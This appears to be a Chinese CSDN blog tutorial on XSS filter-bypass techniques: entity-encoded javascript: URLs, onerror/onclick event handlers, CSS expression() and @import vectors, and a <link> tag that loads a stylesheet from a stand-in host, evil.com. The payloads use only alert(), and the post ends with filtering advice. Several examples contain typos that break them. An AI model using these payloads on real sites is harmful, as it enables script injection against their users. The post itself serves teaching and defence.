xss的攻击方式二

最新推荐文章于 2022-09-27 21:20:46 发布
最新推荐文章于 2022-09-27 21:20:46 发布
阅读量237 收藏
点赞数
分类专栏: xss跨站剖析与防御
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43803070/article/details/89968572
版权

4)对标签属性值进行编码
如果程序对html标签的属性值(注意是属性值不是属性)进行过滤,我们可以对其进行编码来绕过。以为html中属性值本身支持ascll码的形式。比如:
javaScript:alert(“xss”)编程javaScrip&#115&#58alert(“xss”)
同时在此基础上如果过滤了空格、tab键等,我们也可以将他们进行编码转化。比如换行符的ascll编码为&#10、tab的编码为&#09.所以我们可以进行如下转化。/ 变为/。

综上因此我们在防御xss的时候也应该过滤掉#、&。

5)产生自己的事件:
事件能让Javascript代码执行比如:
<input tupe=“button” value=“click” onlick=“alert:(“xss”)”>
我们点击click按钮,即可触发onlick事件,进而触发代码。
再比如:
<img src="#" οnerrοr=alert:(“xss”)>在这里oneerro是img标记的一个事件,只要页面发生错误,该事件就被激活,进而执行代码。src属性用来引用图片的地址,如果地址不存在或者是错误的就会报错。
6)css跨站剖析
css跨站脚本的另一个载体是css样式表。但是css样式表在各个浏览器之间不能通用,甚至同一浏览器不同版本之间都不能通用。
使用css执行JavaScript代码的示例如下:
<div style=“background-image:url(javascript:alert(‘xss’))”>
<style>
body {background-image: url(“javascript:alert(‘xss’)”);}
</style>
使用expression同样也可以触发xss漏洞:
<div style=“width: expression(alert(‘xss’));”>
<style>
body {background-image: expression(alert(‘xss’));}
</style>
从上面我们可以看出,如果客户端禁用了style标签,我们可以利用html标签的style属性执行代码,。而且style属性可以和任意字符的标签结合。
css有一个特点:
css样式表不需要嵌入HTML代码中,他能从其他文件甚至是从不同的服务器上进行引用,比如,用户可以使用<link>标签引用css。
例如:
假设样式表文件的地址为http://www.evil.com/attack.css。其中嵌入了代码
p {
background-image: expression(alert(‘xss’));
}
这时候目标网站的xss explipt为:
<link rel=“stylesheet” herf=“http://www.evil.com/attack.css”>
另外也可利用@import进行导入。@import有一个特点,就是能直接执行Javascript代码,比如:
<style>
@import ‘javascript:alert(“xss”)’;
</style>
**

综上所述:安全起见,我们也应该过滤expression、JavaScript、import等关键字。

**

补充:
background-image 属性描述了元素的背景图像.
body {background-image:url(‘paper.gif’);}

暮秋初九
关注
专栏目录
style background变量vue
u013994400的博客
12-01 2841
style的baclground 变量
XSS(跨站脚本攻击概述)构造绕过过滤
喝咖啡的猫的博客
09-23 518
xss的分类 反射性XSS(通常出现在搜索框,登入口处) 持久型(通常出现在评论,留言,博客日志处) xss的构造分类 利用<>标记注射 HTML/JAVASCRIPT <script>alert('xss')</script> </textarea><script>alert...
xss靶场通关
爱吃仡坨的Blog
09-27 465
1、利用标记,构造标签执行JavaScript的xss代码2、利用html标签性支持Javascript:script()伪协议(支持标签性的有href、lowsrc、bgsound、background、value、action、dynsrc等)、执行xss代码3、利用JavaScript在引号中只用分号分割单词或强制语句结束,用换行符忽略分号强制结束一个完整的语句,而忽略回车、空格、tab等键、绕过对javascript的关键字过滤,
XSS小结
wkend的博客
10-19 1591
XSS是什么? XSS全称跨站脚本(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。跨站点脚本(XSS)攻击是一种注射型攻击,攻击者在可信的网页中嵌入恶意代码,用户访问可信网页时触发XSS而被攻击。 XSS会造成那些危害? 攻击者通过Web应用程序发送恶意代码,一般以浏览器脚本的形式发送给不同的终端用...
XSS (1)
qq_41007744的博客
05-14 486
XSS的分类反射型XSS:反射型跨站脚本也称作非持久型、参数型跨站脚本,这种类型最常见,也是最广使用的。主要用于将恶意脚本附加道URL地址的参数中http://www.test.com/search.php?key="&gt;&lt;script&gt;alert("xss")&lt;/script&gt; http://www.test.com/help.shtml?query=%3Cscrip...
关于pdf文件xss攻击问题,配置xssFilter方法
12-21
PDF文件XSS攻击问题主要指的是攻击者通过构造恶意的PDF文档,利用其中的脚本语言功能,尝试在用户的浏览器上执行跨站脚本攻击(XSS)。这种攻击方式可能导致敏感信息泄露、用户权限滥用或其他安全风险。在SpringBoot...
XSS攻击常识及常见的XSS攻击脚本汇总.pdf
12-26
XSS攻击常识及常见的XSS攻击脚本汇总
springboot2.x使用Jsoup防XSS攻击的实现
10-15
通过以上方式,SpringBoot 2.x应用可以有效地减少XSS攻击的风险。不过,XSS防护并非仅靠单一技术就能解决,还需要结合HTTP头部安全设置(如Content-Security-Policy)、输入验证、输出编码等多方面的策略来构建全面...
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
【PDF-XSS攻击】Java项目-上传文件-解决PDF文件XSS攻击
最新发布
04-07
PDF-XSS实例文件
XSS备忘录(转)
weixin_47306547的博客
09-17 2764
目录 原文地址:http://drops.wooyun.org/tips/1955 介绍 测试 xss 探测器 xss 探测器2 无过滤绕过 通过javascript指令实现的图片xss 无引号无分号 不区分大小写的xss攻击向量 html 实体 重音符混淆 畸形的A标签 畸形的IMG标签 fromCharCode 默认SRC性去绕过SRC域名检测过滤器 默认SRC性通过省略它的值 默认SRC性通过完全不设置它 通过error事件触发alert 十进制html编码
XSS插入绕过一些方式总结
热门推荐
煜铭2011
05-05 7万+
0x00前言 我们友情进行XSS检查,偶然跳出个小弹窗,其中我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其中XSS有反射、存储、DOM这三类,至于具体每个类别的异同之处,本文不做学术介绍,直接介绍实际的插入方式。 0x01 常规插入及其绕过 1 Script 标签 绕过进行一次移除操作: <scr<script&g...
XSS绕过
N1nG
09-22 5141
绕过XSS-Filter =======================利用 用户可以随心所欲地引入插入恶意脚本代码. =========================利用HTML标签性值执行XSS========================= 很多HTML标记中的性都支持javascript:[code]伪协议的形式. //并非所有浏览器都支持,支持的例IE6 可以
(27)【xss绕过】一般测试步骤、绕过方法:触发事件、干扰、编码……
04-03 7021
XSS绕过-合集】
XSS漏洞-03】XSS漏洞语句构造和绕过方法实例
m0_64378913的博客
05-14 4320
目录1 XSS语句构造方式1.1 第一种:利用[<>]构造HTML/JS语句1.2 第种:利用javascript:伪协议1.3 第三种:事件驱动1.4 第四种:利用CSS(层叠样式脚本)1.5 其他标签及手法2 XSS语句变形及绕过2.1 第一种:大小写混编2.2 第种:**双写绕过**。2.3 第三种:**引号的使用**2.4 第四种:使用 [/] 代替空格2.5 第五种:在一些关键字内插入回车符与Tab符2.6 第六种:编码绕过2.7 第七种:拆分跨站2.8
xss妙用,快速测试xss漏洞。
椰树ii
05-24 1万+
#介绍# 这篇文章的主要目的是去给应用安全测试者提供一份xss漏洞检测指南。文章的初始内容由RSnake提供给OWASP,从他的xss备忘录:http://ha.ckers.org/xss.html 。目前这个网页已经重定向到我们这里,我们打算维护和完善它。OWASP的第一个防御备忘录项目:the XSS (Cross Site Scripting) Prevention Cheat Shee
XSS(跨站脚本攻击)详解
谢公子的博客
09-08 7万+
目录 XSS的原理和分类 XSS的攻击载荷 XSS可以插在哪里? XSS漏洞的挖掘 XSS的攻击过程 XSS漏洞的危害 XSS漏洞的简单攻击测试 反射型XSS: 存储型XSS: DOM型XSSXSS的简单过滤和绕过 ​XSS的防御 反射型XSS的利用姿势 get型 post型 利用JS将用户信息发送给后台 XSS的原理和分类 跨站脚本攻击XSS(Cros...
独家分享:跨站脚本攻击XSS详解
weixin_54787877的博客
07-09 1114
跨站脚本攻击概念介绍 XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,位于OWASP top 10 2013/2017年度分别为第三名和第七名,XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码(payload),当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。 从上面中的一段话,可以得知,XSS于客户端攻击,受害者最终是用户,但特别要注意的是网站管理人员也于用户之一。这就意味着XSS
XSS攻击与防御全面指南
XSS钓鱼是利用XSS攻击进行社会工程学的一种方式,通过构造看似合法的链接,诱导用户点击并执行恶意脚本,从而获取用户的敏感信息。 总结来说,XSS攻击是一种严重威胁,需要网站开发者采取严格的防御措施,包括但不...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值